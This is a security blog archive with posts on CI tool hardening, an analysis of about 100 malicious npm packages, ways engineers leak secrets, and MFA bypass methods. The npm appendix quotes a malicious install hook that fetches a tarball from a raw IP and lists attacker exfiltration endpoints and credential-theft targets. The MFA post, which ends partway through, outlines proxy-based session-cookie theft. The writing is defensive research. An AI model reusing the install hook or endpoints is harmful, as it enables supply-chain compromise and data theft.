Category Archives: Research Work

Strength Your Shift-Left Security Foundations: Best Practices for Securing Your CI Tools

Shift-Left Security with CI Tools

Emphasizing early detection and mitigation of security issues within the software development lifecycle, the shift-left security approach is crucial in addressing the increasing complexity of security, spanning from local infrastructure to cloud environments. This method of tackling security challenges has evolved into a benchmark for assessing the reliability and maturity of your Software Development Life Cycle (SDLC) under many organizations. Continuous Integration (CI) tools play a pivotal and fundamental role in implementing and reinforcing “Shift-Left” security practices within the software development lifecycle as comprehensive CI tools integrate and automate various security tests from container scanning to secret scanning.

Securing the CI tools can present a challenge, and mishandling this process carries the risk of triggering adverse security incidents. This is particularly critical because CI tools have access to a variety of resources, ranging from source codes and databases to secret storages.

Best Practices to Secure your CI tools

Consider these best practices crucial for safeguarding your CI tools and fortifying your Shift-Left Security Foundation. The best practices could be classified into three different categories, Securing Infra configuration of your CI tools, Implement Robust Access Control to CI tools and Consider CI scripts with the same level of importance as your production code.

Securing Infra configuration of your CI tools

Configuring your CI tools properly during deployment is a crucial step in ensuring their security. Below are some common configurations that you should consider adhering to when deploying your CI tools:

Place Your CI Tools Behind a Gateway to Restrict Public Access

In most scenarios, CI tools are deployed within development environments to access resources throughout the Software Development Life Cycle (SDLC). Placing your CI tools behind a gateway ensures that only your organization has access to them.

Ensure Container Images used by your CI tools is secure

Ensuring the security of CI tools’ images is essential for maintaining the overall security of your Continuous Integration (CI) pipeline. Here are some practices to help ensure the security of CI tools’ images.

  1. Use the image from Ensure that the base images used for CI tools are from reputable sources and have undergone security evaluations
  2. Install only the necessary components and dependencies in the CI tool images. Avoid unnecessary packages and services to minimize potential security risks.
  3. Run container scans before deploying

Securing communication between CI tools and other resources

As CI tools need to be granted access to different resources so that it could set up all the components for other tests, we need to ensure the communication between the CI tools and the resource are secure. For example, enforce Use HTTPS/SSL/TLS, enforce network segmentation to isolate the communication channels between CI tools and other resources and add authorization layers between your CI tools and the other resource.

Modifying default credentials for improved security

Some CI tools are set up with some default configuration, for example, default credentials.  To remove the default credentials in your CI tools, you need to identify the configuration files or settings where default credentials are specified. This might include configuration files for applications, databases, or any system requiring authentication.

Implement Robust Access Control to CI tools

Once we have set up secure deployment environments for our CI tools, we need to implement a robust access control to the CI tools. When implementing access controls for your CI tools, there are two key aspects to consider. The first involves restricting who can access your CI tools and defining the manner in which access is granted. The second part focuses on limiting the resources that your CI tools are authorized to access.

Restrict access to your CI tools

Follow the principle of least privilege by granting users and systems the minimum level of access required to perform their tasks to avoid assigning overly permissive roles to the users. For example, a developer should be able to view test results under the CI tools but they should not be granted permissions to change and deploy the CI scripts running in the CI tools;  The administrator should at least use MFA when accessing the CI tools;. Define roles based on job responsibilities, ensuring that each role has the necessary access without unnecessary privileges.

Restrict the resource your CI tools could access

As previously mentioned, CI tools have access to a diverse range of resources, including source codes, databases, and secret storage. It is imperative to establish accurate and granular role assignments and access controls for CI tools to prevent the assignment of overly permissive roles.

In certain incidents, security breaches targeting CI tools have demonstrated the potential for bad actors to exfiltrate product data. This occurs when CI tools, designed to access only sample data in development or test environments, are granted IAM roles with permissions beyond what is strictly necessary.

To address this, consider the following best practices for restricting CI tool access:

  1. Apply the principle of least privilege to your CI tools as well to limit the access of the CI tools itself. 
  2. Add authorization layer between the CI tools and the resource.

For example, if you deploy Jenkins CI tools in your cloud environment,  you should define a proper IAM policy to the role that the Jenkins Instance should consume and in the Policy, you should only allow the necessary actions.

Consider CI scripts with the same level of importance as your production code.

After you set up secure deployment environments for your CI tools and grant the proper access control to these tools, you would start to write your CI scripts to integrate all the different tests, regression, feature testing and security testing under your CI tools.

In numerous instances, CI scripts are authored by operations engineers or DevOps teams rather than developers. This can lead to certain security checks being less stringent, as there is a perception that these CI scripts are considered internal code. Due to this mis-perception, many security issues could be introduced with your CI Scripts.  In order to ensure that your CI scripts adhere to the security standards as you use for your production codes, it is advised to add the following security checks.

Implement Security Reviews and Peer Reviews to review CI Scripts

Establish clear guidelines and roles for security reviews, involving diverse teams in collaborative discussions to assess code against coding standards and security best practices. 

Activate All Automated Security Scanning Tools to scan CI scripts

Enable security scanning tools, such as, dependency scanning (SCA), Secret Scanning, SAST Scanning and SBOM against your CI scripts to proactively identify vulnerabilities in your CI scripts during the early stages of the SDLC. It is crucial to enforce actions upon detection of potential security issues by these automated scanning tools after enabling all these automated security scanning. One common issue we’ve observed is the absence of action items, even when the automated scans identify valid security concerns.  

Conduct Regular Security Audits and Updates 

Perform routine security audits and updates alongside enabling comprehensive security scans during CI script commits. Regular audits are essential to maintain system currency and address security issues stemming from legacy code. For instance, a vulnerable dependency library within your CI scripts could be identified and addressed through these audits.

Establish Robust Monitoring and Logging

Similar to production code,  it is important to enhance monitoring and logging for CI scripts, integrate logging directly into scripts, define key metrics for tracking, and leverage built-in tools from your CI/CD platform. Centralize logs for comprehensive analysis, set up alerts to receive immediate notifications for critical events, and regularly review logs for early issue detection. 

Conclusion

In conclusion, as technology evolves and the central role that CI tools play in shaping your “Shift-left” security stance, the role of CI tools becomes increasingly crucial in ensuring the integrity and security of software development processes. Fortifying the foundations of “Shift-Left” security for CI tools is paramount in establishing a proactive and resilient security posture under your organization. Emphasizing robust access controls, secure configurations, and regular updates serves as a solid defense against potential threat.By following the best practices outlined in this guide, your organization can effectively mitigate risks, identify vulnerabilities early in the development lifecycle, and cultivate a culture of heightened security awareness.

What is behind the NPM malicious packages?

An analysis of 100 malicious NPM packages 

Background

The practice of attackers publishing malicious NPM packages to the npm registry for the purposes of stealing sensitive information or launching supply chain attacks is not a new phenomenon. Every month, hundreds of malicious packages are detected and reported by security companies. For example, Snyk vulnerability DB added hundreds of malicious npm packages every month

To ascertain the objectives of the malicious packages,I initiated the process of extracting the source codes  of the most recently 104 malicious packages listed under Snyk vulnerability DB (The list might not be the latest now as the process started at the beginning of April) , with the aim of closely examining the activities that the packages are designed to perform and how it is going to launch malicious activities.   

Key Findings from the Analysis

Upon completion of the analysis, the results were unexpected, with both positive and negative aspects that can be gleaned from the findings. The Appendix provides details about the analysis against these malicious packages, including the package name, source code and the malicious activity executed by the malicious package. Here are some primary findings drawn from the analysis.

  • Key Findings 1.  More than 95% malicious package are created for POC purposes
  • Key Findings 2:  DNS Data Exfiltration and Data Encryption are used to steal collected data
  • Key Findings 3:  Steal Discord Token and Environment variables are still key motivations for the malicious packages  
  • Key Findings 4: AI is a valuable tool to detect and analyze malicious packages.
  • Key Findings 5: 70% malicious NPM package are sending collected data over HTTPS requests
  • Key Findings 6:  99% of the malicious package are executed at install time

Key Findings 1.  More than 95% malicious package are created for POC purposes

One of the significant discoveries was that over 95% of the malicious packages were created for the sole purpose of Proof of Concept (POC) demonstration by security researchers or bug bounty hunters. 

These malicious packages analyzed were found to collect system information, including non-sensitive data such as the OS platform, hostname, username, current path, and public IP address, which do not pose immediate threats. Out of the 100 packages examined, the majority were developed for POC demonstrations. It is surprising to note that these security researchers seem to be saturating the npm registry with so many packages;  and it is unclear whether this is beneficial or detrimental for security. 

Key Findings 2:  DNS Data Exfiltration and Data Encryption are used to steal collected data

To ensure the collected data by the malicious code  is harvested by the attacker, we found the DNS data exfiltration and data encryptions are used when sending collected data to the destination target controlled by the attacker 

The use of DNS as a means for data exfiltration is becoming more common by  attackers as many security products are performing well to detect malicious activity through TCP protocols.  As observed during the analyzing, we saw a couple of dozen’s malicious packages are using DNS data exfiltration to steal sensitive data.

Another way to hide the malicious activity discovered when analyzing the malicious package is to use encryption to encrypt the collected data when sending over HTTPS requests.  

Key Findings 3:  Steal Discord Token and Environment variables are still key motivations for the malicious packages  

Based on our analysis, it has been found that the stealing of Discord tokens and sensitive environment variables (login credentials, system and network data) remains a key motivation for creating malicious packages. 

In addition to stealing Discord tokens and environment variables, the other motivations for creating and distributing malicious packages that we identified are running cryptocurrency miners or ransomware and using the packages to create botnets for use in other malicious campaigns.  

We also noted that  it is very likely for an attacker to use a combination of different methods to achieve their goals. In one of  the packages (ul-mailru) analyzed, we found the malicious package is using a nodemailer function to send email besides stealing the system environment variables.

Key Findings 4: AI is a valuable tool to detect and analyze malicious packages.

The obfuscation techniques used in NPM malicious packages can make it difficult for security researchers or software developers to read and understand the intention of the code as the obfuscated code is not really human readable. However, by using AI powered tools, like ChatGPT, to deobfuscate the codes, it was possible to accurately deobfuscate the malicious packages and quickly analyze the intentions of the codes.  I was kind of shocked to see how accurate and quick that ChatGPT could deobfuscate some malicious obfuscated packages when firstly used to analyze a malicious package (not listed in the 100 packages analyzed).

Besiding deobfuscating the packages,   I was using ChatGPT to double check the codes of the malicious packages to ensure comprehensive analysis of the malicious packages;  and the ChatGPT was able to find more data compared to the results that I analyzed. 

This highlights  the capability of using AI-powered tools like ChatGPT to assist in the detection and analysis of malicious packages.

Key Findings 5: 70% malicious NPM package are sending collected data over HTTPS requests

With more and more security products being deployed in the critical environment to monitor suspicious traffic, using HTTPS request or other TCP protocol sends sensitive data could be detected relatively easier by these security tools. 

But it is surprising to see that more than 70% of the analyzed packages are still using HTTPS requests to send collected data. Many malicious packages are using pipedream to create a webhook and deliver the collected data through it.

Key Findings 6:  99% of the malicious package are executed at install time

A noteworthy discovery is that 99% of the examined packages execute the malicious code by utilizing the “preinstall” and “install” scripts specified in the package.json file  during the package installation time. It means,  that upon running the command “npm install malicious-package” in your terminal,  the malicious code will be activated, regardless of whether you are actively using it or not after installing

Due to this specific pattern, I think it might be easy for some automation tools to use this pattern to analyze the package.json file to detect malicious packages. For developers,  checking the package.json file for suspicious scripts can help to mitigate risk of installing a malicious package.

Conclusion

In conclusion, here are some key takeaways from the analysis

  • As the cost of publishing a malicious npm package is really low, the threat of the malicious package continues to evolve. It is important for the NPM community to perform some proactive methods to improve the security of the NPM ecosystem. 
  • The use of sophisticated techniques, such as code obfuscation, encryption and DNS data exfiltration, employed by attackers shows the need for advanced security tools that can detect and prevent such attacks. 
  • By considering the huge amount of malicious packages published daily and the specific patterns that most malicious packages are using, integrating AI into security tools could be a good option to combat malicious packages.

However, it is important to note that the analysis only represents a tiny portion of the malicious packages published daily, and there may be many more undiscovered malicious packages in the wild. 

Appendix

Package NameMalicious ActivitySource CodeNOTE
mathjs-minSteal Discord token when a user performing squrt_num operationLinkMalicious Package
w00dr0w-test 1. Perform  a combination of system and network reconnaissance
2. Send the collected data to a remote server  by using DNS lookup query after setting DNS server 3.145.70.183
LinkPOC
cirrus-matchmaker1. Collect the system information and send it to the specified URLeo6aglyemjbsegf.m.pipedream.net through HTTP request
2. Write a file in the local system
LinkPOC
pixelstreaming-sfu1. Collect the system information and send it to the specified URLeo6aglyemjbsegf.m.pipedream.net through HTTP request
2. Write a file in the local system
LinkPOCsame for cirrus-matchmaker  
usaa-select 1. Perform a combination of system and network reconnaissance to collect data
2. Send the collected data to a remote server  by using DNS lookup query to DNS server 3.145.70.183
LinkPOCsame for w00dr0w-test  
stripe-firebase-extensions1. Collect the system information and send it to the specified URLeo6aglyemjbsegf.m.pipedream.net through HTTP request2. Write a file in the local systemLinkPOC same for cirrus-matchmaker  
firestore-stripe-payments 1. Collect the system information and send it to the specified URLeo6aglyemjbsegf.m.pipedream.net through HTTP request
2. Write a file in the local system
LinkPOC same for cirrus-matchmaker  Same author
usaa-slider1. Perform a combination of system and network reconnaissance to collect data
2. Send the collected data to a remote server  by using DNS lookup query to DNS server 3.145.70.183
LinkPOC
Same to the author of w00dr0w-test 
int_stripe_sfra1. Collect the system information and send it to the specified URLeo6aglyemjbsegf.m.pipedream.net through HTTP request
2. Write a file in the local system
Linksame for cirrus-matchmaker  Same author
ul-mailru1. Use nodemailer library to send an email using a Simple Mail Transfer Protocol (SMTP) server hosted on the domain  kedrns.com.
2. collect the system environment variables and sent data to eod8iy0mxruchl8.m.pipedream.net
LinkMalicious 
stats-collect-components1. Collect  system information and send it to a burp endpoint through HTTP RequestLinkPOC
github-repos-searching1. Install another maliciou file  through package.json preinstall scripts `”install”: “npm install http://18.119.19.108/withouttasty-1.0.0.tgz?yy=`npm get cache`;”`LinkMalicious
parallel-workers Collect system information, like hostname, DNS server, username and send the collected data to https://eot8atqciimlu9t.m.pipedream.net through HTTP Request LinkPOC

hoots-lib
Collect system information and AWS credentials of the instance if it’s running on an EC2 instance and send it to a Burp endpoint through HTTP request
Steal environment variables and send it to a  remote host 
LinkMalicious
tiaa-web-ui-coreCollect system information such as the hostname, type, platform, architecture, release, uptime, load average, total memory, free memory, CPUs, and network interfaces and send it to a remote web server through HTTP request LinkPOC
dvf-utils Collect the system information and send it to the specified URL through HTTP requestLinkPOC
Same todvf-utils 
owa-trace 1.Collect System information and use the environment variable, like IP address, hostname2. Send the stolen data using dns lookup with data exfiltrationLinkPOCSame fo owa-trace 
owa-fabric-theme 1.Collect System information and use the environment variable, like IP address, hostname2. Send the stolen data using dns lookup with data exfiltrationLinkPOC Same fo owa-trace 
solc-0.8 Collect the system information and send it to the specified URL through HTTP requestLinkPOCdvf-utils
@exabyte-io/chimpy Source code:https://socket.dev/npm/package/@exabyte-io/chimpy/files/2023.3.3-3/ LinkNot Sure
owa-theme 1.Collect System information and use the environment variable, like IP address, hostname2. Send the stolen data using dns lookup with data exfiltrationLinkPOC Same fo owa-trace 
egstore-suspense 1. Collect System information and all the installed packages under this project 2. Send the collect information through HTTP requestLinkPOC
clientcore-base-businesslogic1.Collect System information and use the environment variable, like IP address, hostname2. Send the stolen data using dns lookup with data exfiltrationLinkPOC
Same to owa-trace  
owa-sprite1.Collect System information and use the environment variable, like IP address, hostname2. Send the stolen data using dns lookup with data exfiltrationLinkPOC
Same to owa-trace  
clientcore-onesrv-serviceclients1.Collect System information and use the environment variable, like IP address, hostname2. Send the stolen data using dns lookup with data exfiltrationLinkPOC
Same to owa-trace 
testenbdbank1.Collect System information and use the environment variable, like IP address, hostname and the content of /etc/passwd file 2. Send the collected data through HTTP requestLinkPOC
teams-web-part-applicationGather information about the system (hostname, network interfaces, system path, username, and current package) and sending it to a specified URL using an HTTP GET requestLinkPOC
clientcore-onesrv-businesslogic1.Collect System information and use the environment variable, like API key. Then make an API request to pull user data. 2. Send the stolen data using dns lookup with data exfiltrationLinkPOC
@exabyte-io/wode.jsNot clear why it is marked as maliciousLinkNOT sure
cp-react-ui-libCollect /etc/passwd and send it to a remote server through HTTP by using  preinstall scripts defined under package.jsonLinkPOC
onenote-meetingsGather information about the system (hostname, network interfaces, system path, username, and current package) and sending it to a specified URL using an HTTP GET requestLinkPOCSame to teams-web-part-application
ifabric-styling-bundleGather information about the system (hostname, network interfaces, system path, username, and current package) and sending it to a specified URL using an HTTP GET requestLinkPOCSame to teams-web-part-application
seafoam-desktopCollect the system information and send it to the specified URL through HTTP requestLinkPOC
Same todvf-utils 
odsp-sharedCollect system and network information and sends it to a server through HTTP requestLinkPOC
@exabyte-io/made.js Not sure why it is marked as maliciousLinkNot sure
clientcore-models-catalyst 1.Collect System information and use the environment variable, like IP address, hostname2. Send the stolen data using dns lookup with data exfiltrationLinkPOCSame to owa-trace  
clientcore-catalyst-businesslogic1.Collect System information and use the environment variable, like IP address, hostname2. Send the stolen data using dns lookup with data exfiltrationLinkPOCSame to owa-trace  
cms-businesslogic-extensions1.Collect System information and use the environment variable, like IP address, hostname2. Send the stolen data using dns lookup with data exfiltrationLinkPOCSame to owa-trace  
egstore-query1. Collect System information and all the installed packages under this project 2. Send the collect information through HTTP requestLinkPOC
Same to egstore-suspense 
teams-calendar-web partGather information about the system (hostname, network interfaces, system path, username, and current package) and sending it to a specified URL using an HTTP GET requestLinkPOC
Same to teams-web-part-application
cms-businesslogic1.Collect System information and use the environment variable, like IP address, hostname2. Send the stolen data using dns lookup with data exfiltrationLinkPOCSame to owa-trace  
npo-common 1.Collect System information and use the environment variable, like IP address, hostname2. Send the stolen data using dns lookup with data exfiltrationLinkPOCSame to owa-trace  
egstore-ctx 1. Collect System information and all the installed packages under this project 2. Send the collect information through HTTP requestLinkPOC
Same to egstore-suspense 
office-fluid-containerGather information about the system (hostname, network interfaces, system path, username, and current package) and sending it to a specified URL using an HTTP GET requestLinkPOC
Same to teams-web-part-application
globalize-bundle Gather information about the system (hostname, network interfaces, system path, username, and current package) and sending it to a specified URL using an HTTP GET requestLinkPOC
Same to teams-web-part-application
cms-serviceclients 1.Collect System information and use the environment variable, like IP address, hostname2. Send the stolen data using dns lookup with data exfiltrationLinkPOC
Same to owa-trace  
@clearing/models 1. Collect the system information and send it to the specified URL through HTTP requestLinkPOC
Same to def-utl
devcenter-internal-stable 1.Collect System information and use the environment variable, like IP address, hostname2. Send the stolen data using dns lookup with data exfiltrationLinkPOC 
Same to owa-trace  
kol-demoGather information about the system (hostname, network interfaces, system path, username, and current package) and sending it to a specified URL using an HTTP GET requestLinkSame to teams-web-part-application
clientcore-base-serviceclients1.Collect System information and use the environment variable, like IP address, hostname2. Send the stolen data using dns lookup with data exfiltrationLinkPOC 
Same to owa-trace  
cms-ui-presentationlogic 1.Collect System information and use the environment variable, like IP address, hostname2. Send the stolen data using dns lookup with data exfiltrationLinkPOC 
Same to owa-trace  
cms-models 1.Collect System information and use the environment variable, like IP address, hostname2. Send the stolen data using dns lookup with data exfiltrationLinkPOC
Same to owa-trace  
cms-serviceclients-extensions1.Collect System information and use the environment variable, like IP address, hostname2. Send the stolen data using dns lookup with data exfiltrationLinkPOC
Same to owa-trace  
devcenter-internal-beta1.Collect System information and use the environment variable, like IP address, hostname2. Send the stolen data using dns lookup with data exfiltrationLinkPOC
Same to owa-trace  
cms-external-datajs 1.Collect System information and use the environment variable, like IP address, hostname2. Send the stolen data using dns lookup with data exfiltrationLinkPOC
Same to owa-trace  
cms-typed-promise1.Collect System information and use the environment variable, like IP address, hostname2. Send the stolen data using dns lookup with data exfiltrationLinkPOC
Same to owa-trace  
Cms-ui-views 1.Collect System information and use the environment variable, like IP address, hostname2. Send the stolen data using dns lookup with data exfiltrationLinkPOC
Same to owa-trace  
sp-image-editGather information about the system (hostname, network interfaces, system path, username, and current package) and sending it to a specified URL using an HTTP GET requestLinkPOC
Same to teams-web-part-application
catalog-container Gather information about the system (hostname, network interfaces, system path, username, and current package) and sending it to a specified URL using an HTTP GET requestLinkPOC
Same to teams-web-part-application
follow-ebay Gather information about the system (hostname, network interfaces, system path, username, and current package) and sending it to a specified URL using an HTTP GET requestLinkPOC
Same to teams-web-part-application
sp-yammer-common Gather information about the system (hostname, network interfaces, system path, username, and current package) and sending it to a specified URL using an HTTP GET requestLinkPOC
Same to teams-web-part-application
package-private-16Run DNS query to collect a system informationLinkPOC
cms-ui-redux 1.Collect System information and use the environment variable, like IP address, hostname2. Send the stolen data using dns lookup with data exfiltrationLinkPOC
Same to owa-trace  
owa-strings1.Collect System information and use the environment variable, like IP address, hostname2. Send the stolen data using dns lookup with data exfiltrationLinkPoC
Same to owa-trace
core-site-speed-ebayGathering information about the system (hostname, network interfaces, system path, username, and current package) and sending it to a specified URL using an HTTP GET requestLinkPOCSame to teams-web-part-application
fluent-ui-react-latest 1.Collect System information and use the environment variable, like IP address, hostname2. Send the stolen data using dns lookup with data exfiltrationLinkPOC
Same to owa-trace
sp-home-core Gather information about the system (hostname, network interfaces, system path, username, and current package) and sending it to a specified URL using an HTTP GET requestLinkPOCSame to teams-web-part-application
ts-infra-common 1.Collect System information and use the environment variable, like IP address, hostname2. Send the stolen data using dns lookup with data exfiltrationLinkPOC
Same to owa-trace
React-advanced-breadcrumbs 1.Collect System information and use the environment variable, like IP address, hostname2. Send the stolen data using dns lookup with data exfiltrationLinkPOC
Same to owa-trace
cyclotron-svcCollect the system information and send it to the specified URL through HTTP requestLinkPOC
Same todvf-utils 
React-screen-reader-announce 1.Collect System information and use the environment variable, like IP address, hostname2. Send the stolen data using dns lookup with data exfiltrationLinkPOC
Same to owa-trace
canopy-common-fo 1.Collect System information and use the environment variable, like IP address, hostname2. Send the stolen data using dns lookup with data exfiltrationLinkPOC
Same to owa-trace
ing-feat-customer-video Collect the system information and send it to the specified URL through HTTP requestLinkPOC
Same todvf-utils 
ing-feat-chat-components Collect the system information and send it to the specified URL through HTTP requestLinkPOC
Same todvf-utils 
commerce-sdk-reactCollect System information and encrypt it; Send it to a remote server with HTTP requestCreate a local file.LinkPOC
internal-lib-buildCollect System information and encrypt it; Send it to a remote server with HTTP requestCreate a local file.LinkPOC
Same to  commerce-sdk-react 
woofmd-to-bemjsonCollect system information by using preinstall command under package.json file LinkPOC
Same to postcss-file-match 
@geocomponents/reducers  Collect the system information and send it to the specified URL through HTTP requestLinkPOC
rimg-shopifyCollect System and network information. Encrypt the collected information and sent it through HTTP request
LinkPOC
postcss-file-matchCollect system information and send it through a HTTP request by using preinstall command  defined under package.json file LinkPOC
Same to postcss-file-match 
yandex-netCollect system information and send it through a HTTP request by using preinstall command  defined under package.json file LinkPOC
Same to postcss-file-match 
branch-to-cmsg Collect system information and send it through a HTTP request by using preinstall command  defined under package.json file LinkPOC
Same to postcss-file-match 
yappy_tsCollect system information and send it through a HTTP request by using preinstall command  defined under package.json file LinkPOC
Same to postcss-file-match 
taxi-localizationCollect system information and send it through a HTTP request by using preinstall command  defined under package.json file LinkPOC
Same to postcss-file-match 
staff-wwwCollect system information and send it through a HTTP request by using preinstall command  defined under package.json file LinkPOC
Same to postcss-file-match 
hermione-login-pluginCollect system information and send it through a HTTP request by using preinstall command defined under package.json file LinkPOC
Same to postcss-file-match 
tools-access-lego Collect system information and send it through a HTTP request by using preinstall command defined under package.json file LinkPOC
Same to postcss-file-match 
express-tvm-nodejs4Collect system information and send it through a HTTP request by using preinstall command defined under package.json file LinkPOC
Same to postcss-file-match 
y-font-decoderCollect system information and send it through a HTTP request by using preinstall command defined under package.json file LinkPOC
Same to postcss-file-match 
lego-stuff Collect system information and send it through a HTTP request by using preinstall command defined under package.json file LinkPOC
Same to postcss-file-match 
express-yandex-send-limit Collect system information and send it through a HTTP request by using preinstall command defined under package.json file LinkPOC
Same to postcss-file-match
borschik-webp-internalCollect system information and send it through a HTTP request by using preinstall command defined under package.json file LinkPOC
Same to postcss-file-match
supchat-pluginsCollect system information and send it through a HTTP request by using preinstall command defined under package.json file LinkPOC
Same to postcss-file-match
bemhint.i18n Collect system information and send it through a HTTP request by using preinstall command defined under package.json file LinkPOC
Same to postcss-file-match
yandex-cssformat Collect system information and send it through a HTTP request by using preinstall command defined under package.json file LinkPOC
Same to postcss-file-match
portal-node-loggerCollect system information and send it through a HTTP request by using preinstall command defined under package.json file LinkPOC
Same to postcss-file-match
toolbox-bem-bundleCollect system information and send it through a HTTP request by using preinstall command defined under package.json file LinkPOC
Same to postcss-file-match
y-dotCollect system information and send it through a HTTP request by using preinstall command defined under package.json file LinkPOC
Same to postcss-file-match
yandex-bro-embedded-site-apiCollect system information and send it through a HTTP request by using preinstall command defined under package.json file LinkPOC
Same to postcss-file-match 
tanker-ts-i18nCollect system information and send it through a HTTP request by using preinstall command defined under package.json file LinkPOC
Same to postcss-file-match 
fiji-svg-spriteCollect system information and send it through a HTTP request by using preinstall command defined under package.json file 
LinkPOC
Same to postcss-file-match 
karma-jasmine-i-global Collect system information and send it through a HTTP request by using preinstall command defined under package.json file LinkPOCSame to postcss-file-match 
yandex-logger-std Collect system information and send it through a HTTP request by using preinstall command defined under package.json file LinkPOC
Same to postcss-file-match 
pdb-uatraits Collect system information and send it through a HTTP request by using preinstall command defined under package.json file LinkPOC
Same to postcss-file-match 

5 typical ways engineers leak sensitive information and how to mitigate them

Background

From the AWS incidents where an engineer leaked private keys into a public Github repo to the credentials leakage in the online tool, Postman, it is obvious that our engineers could be the weak link in the system when it comes to critical sensitive data leaks.

By learning from all the publicly disclosed incidents, penetration testing experience and some security monitoring programs that I participated in, we could classify the common ways in which an engineer could leak sensitive information into 5 different areas.

Different Ways in Which Engineers Can Cause Sensitive Data Leakage

Sensitive Data Leaks in a Github Repo

The mistake that many developers make is to store secrets in their source code and check them into source control tools, like Github and Gitlab.  According to the latest GitGuardian report, 5.5 commits out of 1000 exposed at least one secret and 1 out of 10 authors are exposing secrets in a Github repo. 

You may argue that the security risk is manageable if these repos are private and only a few developers in your organization have access to them, even if this is a really lousy security practice. The incident experienced by Uber shows how bad things could get even if you put secrets in a private repository. In the incident, an attacker was able to access a S3 bucket with 57 million records of user data after extracting AWS credentials in a commit from a private repo. The worst-case situation is that you mistakenly push some secrets-containing code into public repositories, either under an enterprise or personal Github account. 

Mitigation

  1. Train the engineers not send company related information to a public repo
  2. Enable Secret Scanning in your CI/D pipeline

Sensitive Data Leaks in a Log File

The Log4j issue may be the first thing that springs to mind when thinking about security in logging functions. Yet, logging itself can pose a significant security risk because many  developers use it as an internal debugging tool and log far more data than is required. Sometimes, the logged data contains very sensitive information that should not be recorded anywhere as it would cause severe security incidents. For example, a couple of years back, Twitter sent out an announcement to its users and urged them to change their passwords due to unmasked passwords being logged into an internal log file.

We found that there are three main reasons why developers are logging sensitive information in to log files:

  • Debug log statements are not removed before shipping into production

Throughout development, many developers use logging as a debugging method. They added some log statements to track changes, but they forgot to delete the debug log statements before merging the code into production.

  • Developers are not fully aware of what is logged

As the system becomes more complex, one function requires interactions from multiple services and data is passed between many services. Data transmitted from an upstream service may contain sensitive data, but developers at a downstream service are unaware of the payload in the data. As a result, critical data may be unintentionally logged.

  • Filtering is not applied for debug log

Under some circumstances, it is necessary for a developer to log an error or exception along with the payload causing this error. This could be a problem if no filtering or masking is applied because the exception or the payload could contain sensitive data. 

Mitigation

  1. Integrate sensitive log statement detection with your CI/CD process and implement it at the PR level.
  2. Motivate peer reviewers to pay close attention to the log function
  3. Employ tagged or structured logging.

Sensitive Data Leaks When Using Online Tools

Presently, as more organizations go to the cloud, numerous tools, such as Base64 Decode, JSON format, Diff Checker, online data sharing tools, API testing platforms (i.e., Postman), and even the trendy ChatGPT, have online versions. Many developers benefit from these web tools because you may acquire your desired output with a simple copy/paste.

However, using these online tools carries the risk of disclosing some of your data to the public as you cannot control where your data will go. Many engineers appear to be unaware of the potential consequences. For example, according to a recent study, 2.3% of workers are pasting sensitive material into ChatGPT.

You can find a number of API tokens that have been exposed by searching Postman’s public network with certain keywords (token, secret, etc.).

Mitigation

  1. Engineers should be trained not to send sensitive data to internet tools.
  2. Instead of using online tools, install a toolkit locally.

Sensitive Data Leaks in Misconfigured Cloud Environments

Misconfiguration in a cloud environment is another way an engineer could mistakenly expose sensitive data publicly. There are many types of cloud misconfigurations, but a typical one is when an engineer gives too open permissions to some cloud assets. For example, an engineer could mistakenly configure a S3 bucket policy to grant public access to a bucket which contains sensitive information and cause sensitive data leakages. In addition, you could accidentally deploy internal instances to the public without authorization. 

Mitigation

  1. Keep persistent surveillance of your cloud environment.
  2. Apply your security setup during the build stage, and be wary about giving engineers or devops ad hoc access or permissions.
  3. Engineers should be given the bare minimum of permissions for the desired tasks.

Sensitive Data Leaks in insecure Channels

As a developer, it is safe to assume that you frequently use Zoom and Slack. Although these tools are simple to use, it is also  easy to see how we can unintentionally divulge private information and sensitive data via a Zoom chat or a Slack message.

You might think that we are just sharing among coworkers, but if you share sensitive information in a public channel where anyone at your company can see it, there is no way for us to know how widely it will be distributed both inside and beyond the company.

Mitigation

  1. Train employees to not share sensitive data that they wouldn’t put in an email
  2. Integrate some automation tools to detect sensitive data across these insecure channels

Conclusion

Both technical and human errors have the potential to expose sensitive information. Despite the fact that you implemented  strong data protection systems in place to guard against potential technical errors, there are still many ways in which a developer could expose private information.

When it comes to cybersecurity, humans are always the weakest link and human error is very difficult to avoid. For instance, a developer might unintentionally push private information into a public repository using  their own account; however, by the time we notice it with an automation tool, it would be too late. Please avoid making these frequent mistakes as a developer when committing your code or sharing certain data.

Limitations of MFA and Common techniques to bypass MFA

A lesson learned from Uber and Reddit Security Incident

MFA is becoming increasingly popular as a means of combating rising identity theft through phishing and becoming compliant with identity and access management regulations. MFA has proved to be a simple but effective security control to reduce the risk of your organization. 

However, recent security incidents on Reddit and Uber, on the other hand, demonstrate MFA’s limitations. Furthermore, while participating in some security group discussions, I discovered that some security engineers are not fully aware of these limitations, which could jeopardize your organization regardless of whether you are using a third-party MFA or implementing your own MFA. In this article, we will attempt to detail the most common limitations of MFA that people have overlooked.

Some Limitation about MFA

Here are some MFA drawbacks that are frequently encountered.

MFA could reduce phishing attacks significantly, but could not eliminate them

MFA could be bypass even for the matured vendors

Misconfiguration and poor implementation may make your MFA useless

Email and SMS based MFA are not as secure as you expected

Limitation 1: MFA will NOT eliminate successful phishing attack

MFA makes it more difficult for hackers to gain access to networks and information systems if passwords or personal identification numbers (PINs) are compromised through phishing attacks or other means because MFA adds multiple factors , such as OTP, SMS Code, App PUSH,  for authentication besides the password and PINS. Because of this, many security administrators disregard other security measures or security training because they think that having MFA makes them immune to phishing attempts.

However, there are various ways that the multiple factors could be also vulnerable to phishing attacks and make you still vulnerable to succesful phishing attacks, the recent Uber security incidents and Reddit incidents are two good examples of it. Take the security breach for Uber as an example, though the compromised  Uber account was protected with multi-factor authentication, the attacker allegedly used an MFA Fatigue attack and pretended to be Uber IT support to convince the employee to accept the MFA requests so that they could launch a successful phishing attack.

Limitation 2: MFA could be bypassed, even for the matured vendors

Many MFA vendors claim that their MFA solutions are well-configured to prevent unauthorized authentication. In reality, there is no one-size-fits-all MFA solution to preventing unauthorized authentication. Many MFAs are still vulnerable to multiple methods of circumventing authentication security. Here are some common MFA bypass methods that has been used in the wild to bypass MFA 

1. AitM Phishing or Use of transparent reverse proxies

Different from the traditional phishing attacks, AitM (Adversary-in-the-middle) phishing or use of transparent reverse proxies does something different, it automatically proxies credentials (username and password) and to the real login page and even the MFA code to the real login page if MFA is enabled. When victime completes the MFA through the login page, the web page completes the login session and steals the session cookie through the proxy.  Once the attacker gets the session cookie, the attacker could login and bypass the MFA by making requests with the session cookie directly..  

